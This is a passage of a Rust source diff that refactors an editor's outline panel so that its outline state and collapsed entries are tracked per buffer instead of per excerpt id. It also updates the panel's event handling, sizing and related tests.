.or(match_range.end.text_anchor.buffer_id) + PanelEntry::Search(SearchEntry { match_range, .. }) => multibuffer_snapshot + .anchor_to_buffer_anchor(match_range.start) + .map(|(anchor, _)| anchor.buffer_id) .map(|buffer_id| { outline_panel.update(cx, |outline_panel, cx| { outline_panel @@ -2258,30 +2198,30 @@ impl OutlinePanel { fn render_excerpt( &self, - excerpt: &OutlineEntryExcerpt, + excerpt: &ExcerptRange, depth: usize, window: &mut Window, cx: &mut Context, ) -> Option> { - let item_id = ElementId::from(excerpt.id.to_proto() as usize); + let item_id = ElementId::from(format!("{excerpt:?}")); let is_active = match self.selected_entry() { Some(PanelEntry::Outline(OutlineEntry::Excerpt(selected_excerpt))) => { - selected_excerpt.buffer_id == excerpt.buffer_id && selected_excerpt.id == excerpt.id + selected_excerpt == excerpt } _ => false, }; let has_outlines = self - .excerpts - .get(&excerpt.buffer_id) - .and_then(|excerpts| match &excerpts.get(&excerpt.id)?.outlines { - ExcerptOutlines::Outlines(outlines) => Some(outlines), - ExcerptOutlines::Invalidated(outlines) => Some(outlines), - ExcerptOutlines::NotFetched => None, + .buffers + .get(&excerpt.context.start.buffer_id) + .and_then(|buffer| match &buffer.outlines { + OutlineState::Outlines(outlines) => Some(outlines), + OutlineState::Invalidated(outlines) => Some(outlines), + OutlineState::NotFetched => None, }) .is_some_and(|outlines| !outlines.is_empty()); let is_expanded = !self .collapsed_entries - .contains(&CollapsedEntry::Excerpt(excerpt.buffer_id, excerpt.id)); + .contains(&CollapsedEntry::Excerpt(excerpt.clone())); let color = entry_label_color(is_active); let icon = if has_outlines { FileIcons::get_chevron_icon(is_expanded, cx) @@ -2291,7 +2231,7 @@ impl OutlinePanel { } .unwrap_or_else(empty_icon); - let label = self.excerpt_label(excerpt.buffer_id, &excerpt.range, cx)?; + let label = self.excerpt_label(&excerpt, cx)?; let label_element = Label::new(label) .single_line() .color(color) @@ -2309,13 +2249,8 @@ impl OutlinePanel { )) } - fn excerpt_label( - &self, - buffer_id: BufferId, - range: &ExcerptRange, - cx: &App, - ) -> Option { - let buffer_snapshot = self.buffer_snapshot_for_id(buffer_id, cx)?; + fn excerpt_label(&self, range: &ExcerptRange, cx: &App) -> Option { + let buffer_snapshot = self.buffer_snapshot_for_id(range.context.start.buffer_id, cx)?; let excerpt_range = range.context.to_point(&buffer_snapshot); Some(format!( "Lines {}- {}", @@ -2326,19 +2261,19 @@ impl OutlinePanel { fn render_outline( &self, - outline: &OutlineEntryOutline, + outline: &Outline, depth: usize, string_match: Option<&StringMatch>, window: &mut Window, cx: &mut Context, ) -> Stateful
{ let item_id = ElementId::from(SharedString::from(format!( - "{:?}|{:?}{:?}|{:?}", - outline.buffer_id, outline.excerpt_id, outline.outline.range, &outline.outline.text, + "{:?}|{:?}", + outline.range, &outline.text, ))); let label_element = outline::render_item( - &outline.outline, + &outline, string_match .map(|string_match| string_match.ranges().collect::>()) .unwrap_or_default(), @@ -2347,26 +2282,22 @@ impl OutlinePanel { .into_any_element(); let is_active = match self.selected_entry() { - Some(PanelEntry::Outline(OutlineEntry::Outline(selected))) => { - outline == selected && outline.outline == selected.outline - } + Some(PanelEntry::Outline(OutlineEntry::Outline(selected))) => outline == selected, _ => false, }; let has_children = self .outline_children_cache - .get(&outline.buffer_id) + .get(&outline.range.start.buffer_id) .and_then(|children_map| { - let key = (outline.outline.range.clone(), outline.outline.depth); + let key = (outline.range.clone(), outline.depth); children_map.get(&key) }) .copied() .unwrap_or(false); - let is_expanded = !self.collapsed_entries.contains(&CollapsedEntry::Outline( - outline.buffer_id, - outline.excerpt_id, - outline.outline.range.clone(), - )); + let is_expanded = !self + .collapsed_entries + .contains(&CollapsedEntry::Outline(outline.range.clone())); let icon = if has_children { FileIcons::get_chevron_icon(is_expanded, cx) @@ -2796,7 +2727,7 @@ impl OutlinePanel { let mut new_collapsed_entries = HashSet::default(); let mut new_unfolded_dirs = HashMap::default(); let mut root_entries = HashSet::default(); - let mut new_excerpts = HashMap::>::default(); + let mut new_buffers = HashMap::::default(); let Ok(buffer_excerpts) = outline_panel.update(cx, |outline_panel, cx| { let git_store = outline_panel.project.read(cx).git_store().clone(); new_collapsed_entries = outline_panel.collapsed_entries.clone(); @@ -2805,13 +2736,18 @@ impl OutlinePanel { multi_buffer_snapshot.excerpts().fold( HashMap::default(), - |mut buffer_excerpts, (excerpt_id, buffer_snapshot, excerpt_range)| { + |mut buffer_excerpts, excerpt_range| { + let Some(buffer_snapshot) = multi_buffer_snapshot + .buffer_for_id(excerpt_range.context.start.buffer_id) + else { + return buffer_excerpts; + }; let buffer_id = buffer_snapshot.remote_id(); let file = File::from_dyn(buffer_snapshot.file()); let entry_id = file.and_then(|file| file.project_entry_id()); let worktree = file.map(|file| file.worktree.read(cx).snapshot()); - let is_new = new_entries.contains(&excerpt_id) - || !outline_panel.excerpts.contains_key(&buffer_id); + let is_new = new_entries.contains(&buffer_id) + || !outline_panel.buffers.contains_key(&buffer_id); let is_folded = active_editor.read(cx).is_buffer_folded(buffer_id, cx); let status = git_store .read(cx) @@ -2825,29 +2761,28 @@ impl OutlinePanel { (is_new, is_folded, Vec::new(), entry_id, worktree, status) }) .2 - .push(excerpt_id); + .push(excerpt_range.clone()); - let outlines = match outline_panel - .excerpts - .get(&buffer_id) - .and_then(|excerpts| excerpts.get(&excerpt_id)) - { - Some(old_excerpt) => match &old_excerpt.outlines { - ExcerptOutlines::Outlines(outlines) => { - ExcerptOutlines::Outlines(outlines.clone()) + new_buffers + .entry(buffer_id) + .or_insert_with(|| { + let outlines = match outline_panel.buffers.get(&buffer_id) { + Some(old_buffer) => match &old_buffer.outlines { + OutlineState::Outlines(outlines) => { + OutlineState::Outlines(outlines.clone()) + } + OutlineState::Invalidated(_) => OutlineState::NotFetched, + OutlineState::NotFetched => OutlineState::NotFetched, + }, + None => OutlineState::NotFetched, + }; + BufferOutlines { + outlines, + excerpts: Vec::new(), } - ExcerptOutlines::Invalidated(_) => ExcerptOutlines::NotFetched, - ExcerptOutlines::NotFetched => ExcerptOutlines::NotFetched, - }, - None => ExcerptOutlines::NotFetched, - }; - new_excerpts.entry(buffer_id).or_default().insert( - excerpt_id, - Excerpt { - range: excerpt_range, - outlines, - }, - ); + }) + .excerpts + .push(excerpt_range); buffer_excerpts }, ) @@ -2868,7 +2803,7 @@ impl OutlinePanel { BTreeMap::>::default(); let mut worktree_excerpts = HashMap::< WorktreeId, - HashMap)>, + HashMap>)>, >::default(); let mut external_excerpts = HashMap::default(); @@ -3146,7 +3081,7 @@ impl OutlinePanel { outline_panel .update_in(cx, |outline_panel, window, cx| { outline_panel.new_entries_for_fs_update.clear(); - outline_panel.excerpts = new_excerpts; + outline_panel.buffers = new_buffers; outline_panel.collapsed_entries = new_collapsed_entries; outline_panel.unfolded_dirs = new_unfolded_dirs; outline_panel.fs_entries = new_fs_entries; @@ -3156,7 +3091,7 @@ impl OutlinePanel { // Only update cached entries if we don't have outlines to fetch // If we do have outlines to fetch, let fetch_outdated_outlines handle the update - if outline_panel.excerpt_fetch_ranges(cx).is_empty() { + if outline_panel.buffers_to_fetch().is_empty() { outline_panel.update_cached_entries(debounce, window, cx); } @@ -3204,8 +3139,15 @@ impl OutlinePanel { item_handle: new_active_item.downgrade_item(), active_editor: new_active_editor.downgrade(), }); - self.new_entries_for_fs_update - .extend(new_active_editor.read(cx).buffer().read(cx).excerpt_ids()); + self.new_entries_for_fs_update.extend( + new_active_editor + .read(cx) + .buffer() + .read(cx) + .snapshot(cx) + .excerpts() + .map(|excerpt| excerpt.context.start.buffer_id), + ); self.selected_entry.invalidate(); self.update_fs_entries(new_active_editor, None, window, cx); } @@ -3223,7 +3165,7 @@ impl OutlinePanel { self.fs_entries.clear(); self.fs_entries_depth.clear(); self.fs_children_count.clear(); - self.excerpts.clear(); + self.buffers.clear(); self.cached_entries = Vec::new(); self.selected_entry = SelectedEntry::None; self.pinned = false; @@ -3237,23 +3179,14 @@ impl OutlinePanel { window: &mut Window, cx: &mut Context, ) -> Option { - let selection = editor.update(cx, |editor, cx| { - editor - .selections - .newest::(&editor.display_snapshot(cx)) - .head() - }); let editor_snapshot = editor.update(cx, |editor, cx| editor.snapshot(window, cx)); let multi_buffer = editor.read(cx).buffer(); let multi_buffer_snapshot = multi_buffer.read(cx).snapshot(cx); - let (excerpt_id, buffer, _) = editor - .read(cx) - .buffer() - .read(cx) - .excerpt_containing(selection, cx)?; - let buffer_id = buffer.read(cx).remote_id(); + let anchor = editor.update(cx, |editor, _| editor.selections.newest_anchor().head()); + let selection_display_point = anchor.to_display_point(&editor_snapshot); + let (anchor, _) = multi_buffer_snapshot.anchor_to_buffer_anchor(anchor)?; - if editor.read(cx).is_buffer_folded(buffer_id, cx) { + if editor.read(cx).is_buffer_folded(anchor.buffer_id, cx) { return self .fs_entries .iter() @@ -3266,14 +3199,12 @@ impl OutlinePanel { | FsEntry::ExternalFile(FsEntryExternalFile { buffer_id: other_buffer_id, .. - }) => buffer_id == *other_buffer_id, + }) => anchor.buffer_id == *other_buffer_id, }) .cloned() .map(PanelEntry::Fs); } - let selection_display_point = selection.to_display_point(&editor_snapshot); - match &self.mode { ItemsDisplayMode::Search(search_state) => search_state .matches @@ -3310,32 +3241,31 @@ impl OutlinePanel { }) }), ItemsDisplayMode::Outline => self.outline_location( - buffer_id, - excerpt_id, + anchor, multi_buffer_snapshot, editor_snapshot, selection_display_point, + cx, ), } } fn outline_location( &self, - buffer_id: BufferId, - excerpt_id: ExcerptId, + selection_anchor: Anchor, multi_buffer_snapshot: editor::MultiBufferSnapshot, editor_snapshot: editor::EditorSnapshot, selection_display_point: DisplayPoint, + cx: &App, ) -> Option { let excerpt_outlines = self - .excerpts - .get(&buffer_id) - .and_then(|excerpts| excerpts.get(&excerpt_id)) + .buffers + .get(&selection_anchor.buffer_id) .into_iter() - .flat_map(|excerpt| excerpt.iter_outlines()) + .flat_map(|buffer| buffer.iter_outlines()) .flat_map(|outline| { let range = multi_buffer_snapshot - .anchor_range_in_excerpt(excerpt_id, outline.range.clone())?; + .buffer_anchor_range_to_anchor_range(outline.range.clone())?; Some(( range.start.to_display_point(&editor_snapshot) ..range.end.to_display_point(&editor_snapshot), @@ -3407,25 +3337,32 @@ impl OutlinePanel { selection_display_point - outline_range.end }; + // An outline item's range can extend to the same row the next + // item starts on, so when the cursor is at the start of that + // row, prefer the item that starts there over any item whose + // range merely overlaps that row. + let cursor_not_at_outline_start = outline_range.start != selection_display_point; ( + cursor_not_at_outline_start, cmp::Reverse(outline.depth), - distance_from_start + distance_from_end, + distance_from_start, + distance_from_end, ) }) .map(|(_, (_, outline))| *outline) .cloned(); let closest_container = match outline_item { - Some(outline) => PanelEntry::Outline(OutlineEntry::Outline(OutlineEntryOutline { - buffer_id, - excerpt_id, - outline, - })), + Some(outline) => PanelEntry::Outline(OutlineEntry::Outline(outline)), None => { self.cached_entries.iter().rev().find_map(|cached_entry| { match &cached_entry.entry { PanelEntry::Outline(OutlineEntry::Excerpt(excerpt)) => { - if excerpt.buffer_id == buffer_id && excerpt.id == excerpt_id { + if excerpt.context.start.buffer_id == selection_anchor.buffer_id + && let Some(buffer_snapshot) = + self.buffer_snapshot_for_id(excerpt.context.start.buffer_id, cx) + && excerpt.contains(&selection_anchor, &buffer_snapshot) + { Some(cached_entry.entry.clone()) } else { None @@ -3435,6 +3372,7 @@ impl OutlinePanel { FsEntry::ExternalFile(FsEntryExternalFile { buffer_id: file_buffer_id, excerpts: file_excerpts, + .. }) | FsEntry::File(FsEntryFile { buffer_id: file_buffer_id, @@ -3442,7 +3380,13 @@ impl OutlinePanel { .. }), ) => { - if file_buffer_id == &buffer_id && file_excerpts.contains(&excerpt_id) { + if *file_buffer_id == selection_anchor.buffer_id + && let Some(buffer_snapshot) = + self.buffer_snapshot_for_id(*file_buffer_id, cx) + && file_excerpts.iter().any(|excerpt| { + excerpt.contains(&selection_anchor, &buffer_snapshot) + }) + { Some(cached_entry.entry.clone()) } else { None @@ -3457,18 +3401,17 @@ impl OutlinePanel { } fn fetch_outdated_outlines(&mut self, window: &mut Window, cx: &mut Context) { - let excerpt_fetch_ranges = self.excerpt_fetch_ranges(cx); - if excerpt_fetch_ranges.is_empty() { + let buffers_to_fetch = self.buffers_to_fetch(); + if buffers_to_fetch.is_empty() { return; } let first_update = Arc::new(AtomicBool::new(true)); - for (buffer_id, (_buffer_snapshot, excerpt_ranges)) in excerpt_fetch_ranges { + for buffer_id in buffers_to_fetch { let outline_task = self.active_editor().map(|editor| { editor.update(cx, |editor, cx| editor.buffer_outline_items(buffer_id, cx)) }); - let excerpt_ids = excerpt_ranges.keys().copied().collect::>(); let first_update = first_update.clone(); self.outline_fetch_tasks.insert( @@ -3503,40 +3446,26 @@ impl OutlinePanel { Some(UPDATE_DEBOUNCE) }; - for excerpt_id in &excerpt_ids { - if let Some(excerpt) = outline_panel - .excerpts - .entry(buffer_id) - .or_default() - .get_mut(excerpt_id) + if let Some(buffer) = outline_panel.buffers.get_mut(&buffer_id) { + buffer.outlines = OutlineState::Outlines(fetched_outlines.clone()); + + if let Some(default_depth) = pending_default_depth + && let OutlineState::Outlines(outlines) = &buffer.outlines { - excerpt.outlines = - ExcerptOutlines::Outlines(fetched_outlines.clone()); - - if let Some(default_depth) = pending_default_depth - && let ExcerptOutlines::Outlines(outlines) = - &excerpt.outlines - { - outlines - .iter() - .filter(|outline| { - (default_depth == 0 - || outline.depth >= default_depth) - && outlines_with_children.contains(&( - outline.range.clone(), - outline.depth, - )) - }) - .for_each(|outline| { - outline_panel.collapsed_entries.insert( - CollapsedEntry::Outline( - buffer_id, - *excerpt_id, - outline.range.clone(), - ), - ); - }); - } + outlines + .iter() + .filter(|outline| { + (default_depth == 0 || outline.depth >= default_depth) + && outlines_with_children.contains(&( + outline.range.clone(), + outline.depth, + )) + }) + .for_each(|outline| { + outline_panel.collapsed_entries.insert( + CollapsedEntry::Outline(outline.range.clone()), + ); + }); } } @@ -3553,73 +3482,35 @@ impl OutlinePanel { .is_some_and(|active_editor| active_editor.read(cx).buffer().read(cx).is_singleton()) } - fn invalidate_outlines(&mut self, ids: &[ExcerptId]) { + fn invalidate_outlines(&mut self, ids: &[BufferId]) { self.outline_fetch_tasks.clear(); let mut ids = ids.iter().collect::>(); - for excerpts in self.excerpts.values_mut() { - ids.retain(|id| { - if let Some(excerpt) = excerpts.get_mut(id) { - excerpt.invalidate_outlines(); - false - } else { - true - } - }); + for (buffer_id, buffer) in self.buffers.iter_mut() { + if ids.remove(&buffer_id) { + buffer.invalidate_outlines(); + } if ids.is_empty() { break; } } } - fn excerpt_fetch_ranges( - &self, - cx: &App, - ) -> HashMap< - BufferId, - ( - BufferSnapshot, - HashMap>, - ), - > { + fn buffers_to_fetch(&self) -> HashSet { self.fs_entries .iter() - .fold(HashMap::default(), |mut excerpts_to_fetch, fs_entry| { + .fold(HashSet::default(), |mut buffers_to_fetch, fs_entry| { match fs_entry { - FsEntry::File(FsEntryFile { - buffer_id, - excerpts: file_excerpts, - .. - }) - | FsEntry::ExternalFile(FsEntryExternalFile { - buffer_id, - excerpts: file_excerpts, - }) => { - let excerpts = self.excerpts.get(buffer_id); - for &file_excerpt in file_excerpts { - if let Some(excerpt) = excerpts - .and_then(|excerpts| excerpts.get(&file_excerpt)) - .filter(|excerpt| excerpt.should_fetch_outlines()) - { - match excerpts_to_fetch.entry(*buffer_id) { - hash_map::Entry::Occupied(mut o) => { - o.get_mut().1.insert(file_excerpt, excerpt.range.clone()); - } - hash_map::Entry::Vacant(v) => { - if let Some(buffer_snapshot) = - self.buffer_snapshot_for_id(*buffer_id, cx) - { - v.insert((buffer_snapshot, HashMap::default())) - .1 - .insert(file_excerpt, excerpt.range.clone()); - } - } - } - } + FsEntry::File(FsEntryFile { buffer_id, .. }) + | FsEntry::ExternalFile(FsEntryExternalFile { buffer_id, .. }) => { + if let Some(buffer) = self.buffers.get(buffer_id) + && buffer.should_fetch_outlines() + { + buffers_to_fetch.insert(*buffer_id); } } FsEntry::Directory(..) => {} } - excerpts_to_fetch + buffers_to_fetch }) } @@ -4017,13 +3908,12 @@ impl OutlinePanel { } else { None }; - if let Some((buffer_id, entry_excerpts)) = excerpts_to_consider + if let Some((buffer_id, _entry_excerpts)) = excerpts_to_consider && !active_editor.read(cx).is_buffer_folded(buffer_id, cx) { - outline_panel.add_excerpt_entries( + outline_panel.add_buffer_entries( &mut generation_state, buffer_id, - entry_excerpts, depth, track_matches, is_singleton, @@ -4171,7 +4061,7 @@ impl OutlinePanel { } PanelEntry::Outline(OutlineEntry::Outline(outline_entry)) => state .match_candidates - .push(StringMatchCandidate::new(id, &outline_entry.outline.text)), + .push(StringMatchCandidate::new(id, &outline_entry.text)), PanelEntry::Outline(OutlineEntry::Excerpt(_)) => {} PanelEntry::Search(new_search_entry) => { if let Some(search_data) = new_search_entry.render_data.get() { @@ -4338,131 +4228,118 @@ impl OutlinePanel { update_cached_entries } - fn add_excerpt_entries( + fn add_buffer_entries( &mut self, state: &mut GenerationState, buffer_id: BufferId, - entries_to_add: &[ExcerptId], parent_depth: usize, track_matches: bool, is_singleton: bool, query: Option<&str>, cx: &mut Context, ) { - if let Some(excerpts) = self.excerpts.get(&buffer_id) { - let buffer_snapshot = self.buffer_snapshot_for_id(buffer_id, cx); + let Some(buffer) = self.buffers.get(&buffer_id) else { + return; + }; - for &excerpt_id in entries_to_add { - let Some(excerpt) = excerpts.get(&excerpt_id) else { - continue; - }; - let excerpt_depth = parent_depth + 1; - self.push_entry( - state, - track_matches, - PanelEntry::Outline(OutlineEntry::Excerpt(OutlineEntryExcerpt { - buffer_id, - id: excerpt_id, - range: excerpt.range.clone(), - })), - excerpt_depth, - cx, - ); + let buffer_snapshot = self.buffer_snapshot_for_id(buffer_id, cx); - let mut outline_base_depth = excerpt_depth + 1; - if is_singleton { - outline_base_depth = 0; - state.clear(); - } else if query.is_none() - && self - .collapsed_entries - .contains(&CollapsedEntry::Excerpt(buffer_id, excerpt_id)) - { - continue; - } + for excerpt in &buffer.excerpts { + let excerpt_depth = parent_depth + 1; + self.push_entry( + state, + track_matches, + PanelEntry::Outline(OutlineEntry::Excerpt(excerpt.clone())), + excerpt_depth, + cx, + ); - let mut last_depth_at_level: Vec>> = vec![None; 10]; + let mut outline_base_depth = excerpt_depth + 1; + if is_singleton { + outline_base_depth = 0; + state.clear(); + } else if query.is_none() + && self + .collapsed_entries + .contains(&CollapsedEntry::Excerpt(excerpt.clone())) + { + continue; + } - let all_outlines: Vec<_> = excerpt.iter_outlines().collect(); + let mut last_depth_at_level: Vec>> = vec![None; 10]; - let mut outline_has_children = HashMap::default(); - let mut visible_outlines = Vec::new(); - let mut collapsed_state: Option<(usize, Range)> = None; + let all_outlines: Vec<_> = buffer.iter_outlines().collect(); - for (i, &outline) in all_outlines.iter().enumerate() { - let has_children = all_outlines - .get(i + 1) - .map(|next| next.depth > outline.depth) - .unwrap_or(false); + let mut outline_has_children = HashMap::default(); + let mut visible_outlines = Vec::new(); + let mut collapsed_state: Option<(usize, Range)> = None; - outline_has_children - .insert((outline.range.clone(), outline.depth), has_children); + for (i, &outline) in all_outlines.iter().enumerate() { + let has_children = all_outlines + .get(i + 1) + .map(|next| next.depth > outline.depth) + .unwrap_or(false); - let mut should_include = true; + outline_has_children.insert((outline.range.clone(), outline.depth), has_children); - if let Some((collapsed_depth, collapsed_range)) = &collapsed_state { - if outline.depth <= *collapsed_depth { + let mut should_include = true; + + if let Some((collapsed_depth, collapsed_range)) = &collapsed_state { + if outline.depth <= *collapsed_depth { + collapsed_state = None; + } else if let Some(buffer_snapshot) = buffer_snapshot.as_ref() { + let outline_start = outline.range.start; + if outline_start + .cmp(&collapsed_range.start, buffer_snapshot) + .is_ge() + && outline_start + .cmp(&collapsed_range.end, buffer_snapshot) + .is_lt() + { + should_include = false; // Skip - inside collapsed range + } else { collapsed_state = None; - } else if let Some(buffer_snapshot) = buffer_snapshot.as_ref() { - let outline_start = outline.range.start; - if outline_start - .cmp(&collapsed_range.start, buffer_snapshot) - .is_ge() - && outline_start - .cmp(&collapsed_range.end, buffer_snapshot) - .is_lt() - { - should_include = false; // Skip - inside collapsed range - } else { - collapsed_state = None; - } } } + } - // Check if this outline itself is collapsed - if should_include - && self.collapsed_entries.contains(&CollapsedEntry::Outline( - buffer_id, - excerpt_id, - outline.range.clone(), - )) - { - collapsed_state = Some((outline.depth, outline.range.clone())); - } + // Check if this outline itself is collapsed + if should_include + && self + .collapsed_entries + .contains(&CollapsedEntry::Outline(outline.range.clone())) + { + collapsed_state = Some((outline.depth, outline.range.clone())); + } - if should_include { - visible_outlines.push(outline); - } + if should_include { + visible_outlines.push(outline); } + } - self.outline_children_cache - .entry(buffer_id) - .or_default() - .extend(outline_has_children); + self.outline_children_cache + .entry(buffer_id) + .or_default() + .extend(outline_has_children); - for outline in visible_outlines { - let outline_entry = OutlineEntryOutline { - buffer_id, - excerpt_id, - outline: outline.clone(), - }; + for outline in visible_outlines { + let outline_entry = outline.clone(); - if outline.depth < last_depth_at_level.len() { - last_depth_at_level[outline.depth] = Some(outline.range.clone()); - // Clear deeper levels when we go back to a shallower depth - for d in (outline.depth + 1)..last_depth_at_level.len() { - last_depth_at_level[d] = None; - } + if outline.depth < last_depth_at_level.len() { + last_depth_at_level[outline.depth] = Some(outline.range.clone()); + // Clear deeper levels when we go back to a shallower depth + for d in (outline.depth + 1)..last_depth_at_level.len() { + last_depth_at_level[d] = None; } - - self.push_entry( - state, - track_matches, - PanelEntry::Outline(OutlineEntry::Outline(outline_entry)), - outline_base_depth + outline.depth, - cx, - ); } + + self.push_entry( + state, + track_matches, + PanelEntry::Outline(OutlineEntry::Outline(outline_entry)), + outline_base_depth + outline.depth, + cx, + ); } } } @@ -4488,32 +4365,37 @@ impl OutlinePanel { FsEntry::File(file) => &file.excerpts, } .iter() - .copied() + .cloned() .collect::>(); let depth = if is_singleton { 0 } else { parent_depth + 1 }; - let new_search_matches = search_state - .matches - .iter() - .filter(|(match_range, _)| { - related_excerpts.contains(&match_range.start.excerpt_id) - || related_excerpts.contains(&match_range.end.excerpt_id) - }) - .filter(|(match_range, _)| { - let editor = active_editor.read(cx); - let snapshot = editor.buffer().read(cx).snapshot(cx); - if let Some(buffer_id) = snapshot.buffer_id_for_anchor(match_range.start) - && editor.is_buffer_folded(buffer_id, cx) - { + let new_search_matches = search_state.matches.iter().filter(|(match_range, _)| { + let editor = active_editor.read(cx); + let snapshot = editor.buffer().read(cx).snapshot(cx); + if !related_excerpts.iter().any(|excerpt| { + let (Some(start), Some(end)) = ( + snapshot.anchor_in_buffer(excerpt.context.start), + snapshot.anchor_in_buffer(excerpt.context.end), + ) else { return false; - } - if let Some(buffer_id) = snapshot.buffer_id_for_anchor(match_range.end) - && editor.is_buffer_folded(buffer_id, cx) - { - return false; - } - true - }); + }; + let excerpt_range = start..end; + excerpt_range.overlaps(match_range, &snapshot) + }) { + return false; + }; + if let Some((buffer_anchor, _)) = snapshot.anchor_to_buffer_anchor(match_range.start) + && editor.is_buffer_folded(buffer_anchor.buffer_id, cx) + { + return false; + } + if let Some((buffer_anchor, _)) = snapshot.anchor_to_buffer_anchor(match_range.end) + && editor.is_buffer_folded(buffer_anchor.buffer_id, cx) + { + return false; + } + true + }); let new_search_entries = new_search_matches .map(|(match_range, search_data)| SearchEntry { @@ -4631,10 +4513,10 @@ impl OutlinePanel { + folded_dirs.entries.len().saturating_sub(1) * "/".len() } PanelEntry::Outline(OutlineEntry::Excerpt(excerpt)) => self - .excerpt_label(excerpt.buffer_id, &excerpt.range, cx) + .excerpt_label(&excerpt, cx) .map(|label| label.len()) .unwrap_or_default(), - PanelEntry::Outline(OutlineEntry::Outline(entry)) => entry.outline.text.len(), + PanelEntry::Outline(OutlineEntry::Outline(entry)) => entry.text.len(), PanelEntry::Search(search) => search .render_data .get() @@ -4812,7 +4694,7 @@ impl OutlinePanel { .size_full() .child(list_contents.size_full().flex_shrink()) .custom_scrollbars( - Scrollbars::for_settings::() + Scrollbars::for_settings::() .tracked_scroll_handle(&self.scroll_handle.clone()) .with_track_along( ScrollAxes::Horizontal, @@ -5004,17 +4886,8 @@ impl Panel for OutlinePanel { }); } - fn size(&self, _: &Window, cx: &App) -> Pixels { - self.width - .unwrap_or_else(|| OutlinePanelSettings::get_global(cx).default_width) - } - - fn set_size(&mut self, size: Option, window: &mut Window, cx: &mut Context) { - self.width = size; - cx.notify(); - cx.defer_in(window, |this, _, cx| { - this.serialize(cx); - }); + fn default_size(&self, _: &Window, cx: &App) -> Pixels { + OutlinePanelSettings::get_global(cx).default_width } fn icon(&self, _: &Window, cx: &App) -> Option { @@ -5073,7 +4946,7 @@ impl Panel for OutlinePanel { } fn activation_priority(&self) -> u32 { - 5 + 6 } } @@ -5226,31 +5099,21 @@ fn subscribe_for_editor_events( outline_panel.reveal_entry_for_selection(editor.clone(), window, cx); cx.notify(); } - EditorEvent::ExcerptsAdded { excerpts, .. } => { + EditorEvent::BuffersRemoved { removed_buffer_ids } => { outline_panel - .new_entries_for_fs_update - .extend(excerpts.iter().map(|&(excerpt_id, _)| excerpt_id)); + .buffers + .retain(|buffer_id, _| !removed_buffer_ids.contains(buffer_id)); outline_panel.update_fs_entries(editor.clone(), debounce, window, cx); } - EditorEvent::ExcerptsRemoved { ids, .. } => { - let mut ids = ids.iter().collect::>(); - for excerpts in outline_panel.excerpts.values_mut() { - excerpts.retain(|excerpt_id, _| !ids.remove(excerpt_id)); - if ids.is_empty() { - break; - } - } + EditorEvent::BufferRangesUpdated { buffer, .. } => { + outline_panel + .new_entries_for_fs_update + .insert(buffer.read(cx).remote_id()); + outline_panel.invalidate_outlines(&[buffer.read(cx).remote_id()]); outline_panel.update_fs_entries(editor.clone(), debounce, window, cx); } - EditorEvent::ExcerptsExpanded { ids } => { - outline_panel.invalidate_outlines(ids); - let update_cached_items = outline_panel.update_non_fs_items(window, cx); - if update_cached_items { - outline_panel.update_cached_entries(Some(UPDATE_DEBOUNCE), window, cx); - } - } - EditorEvent::ExcerptsEdited { ids } => { - outline_panel.invalidate_outlines(ids); + EditorEvent::BuffersEdited { buffer_ids } => { + outline_panel.invalidate_outlines(buffer_ids); let update_cached_items = outline_panel.update_non_fs_items(window, cx); if update_cached_items { outline_panel.update_cached_entries(Some(UPDATE_DEBOUNCE), window, cx); @@ -5264,29 +5127,20 @@ fn subscribe_for_editor_events( outline_panel.new_entries_for_fs_update.extend( ids.iter() .filter(|id| { - outline_panel - .excerpts - .iter() - .find_map(|(buffer_id, excerpts)| { - if excerpts.contains_key(id) { - ignore_selections_change |= outline_panel - .preserve_selection_on_buffer_fold_toggles - .remove(buffer_id); - Some(buffer_id) - } else { - None - } - }) - .map(|buffer_id| { - if editor.read(cx).is_buffer_folded(*buffer_id, cx) { - latest_folded_buffer_id = Some(*buffer_id); - false - } else { - latest_unfolded_buffer_id = Some(*buffer_id); - true - } - }) - .unwrap_or(true) + if outline_panel.buffers.contains_key(&id) { + ignore_selections_change |= outline_panel + .preserve_selection_on_buffer_fold_toggles + .remove(&id); + if editor.read(cx).is_buffer_folded(**id, cx) { + latest_folded_buffer_id = Some(**id); + false + } else { + latest_unfolded_buffer_id = Some(**id); + true + } + } else { + false + } }) .copied(), ); @@ -5322,10 +5176,8 @@ fn subscribe_for_editor_events( outline_panel.update_fs_entries(editor.clone(), debounce, window, cx); } EditorEvent::Reparsed(buffer_id) => { - if let Some(excerpts) = outline_panel.excerpts.get_mut(buffer_id) { - for excerpt in excerpts.values_mut() { - excerpt.invalidate_outlines(); - } + if let Some(buffer) = outline_panel.buffers.get_mut(buffer_id) { + buffer.invalidate_outlines(); } let update_cached_items = outline_panel.update_non_fs_items(window, cx); if update_cached_items { @@ -5333,10 +5185,8 @@ fn subscribe_for_editor_events( } } EditorEvent::OutlineSymbolsChanged => { - for excerpts in outline_panel.excerpts.values_mut() { - for excerpt in excerpts.values_mut() { - excerpt.invalidate_outlines(); - } + for buffer in outline_panel.buffers.values_mut() { + buffer.invalidate_outlines(); } if matches!( outline_panel.selected_entry(), @@ -5384,7 +5234,7 @@ impl GenerationState { mod tests { use db::indoc; use gpui::{TestAppContext, UpdateGlobal, VisualTestContext, WindowHandle}; - use language::{self, FakeLspAdapter, rust_lang}; + use language::{self, FakeLspAdapter, markdown_lang, rust_lang}; use pretty_assertions::assert_eq; use project::FakeFs; use search::{ @@ -6889,7 +6739,7 @@ outline: struct OutlineEntryExcerpt PanelEntry::Outline(outline_entry) => match outline_entry { OutlineEntry::Excerpt(_) => continue, OutlineEntry::Outline(outline_entry) => { - format!("outline: {}", outline_entry.outline.text) + format!("outline: {}", outline_entry.text) } }, PanelEntry::Search(search_entry) => { @@ -6923,7 +6773,7 @@ outline: struct OutlineEntryExcerpt let settings = SettingsStore::test(cx); cx.set_global(settings); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); editor::init(cx); project_search::init(cx); @@ -7257,10 +7107,9 @@ outline: fn main" PanelEntry::Outline(OutlineEntry::Outline(outline)) if panel .outline_children_cache - .get(&outline.buffer_id) + .get(&outline.range.start.buffer_id) .and_then(|children_map| { - let key = - (outline.outline.range.clone(), outline.outline.depth); + let key = (outline.range.clone(), outline.depth); children_map.get(&key) }) .copied() @@ -7347,9 +7196,9 @@ outline: fn main" PanelEntry::Outline(OutlineEntry::Outline(outline)) if panel .outline_children_cache - .get(&outline.buffer_id) + .get(&outline.range.start.buffer_id) .and_then(|children_map| { - let key = (outline.outline.range.clone(), outline.outline.depth); + let key = (outline.range.clone(), outline.depth); children_map.get(&key) }) .copied() @@ -7725,10 +7574,9 @@ outline: fn main" 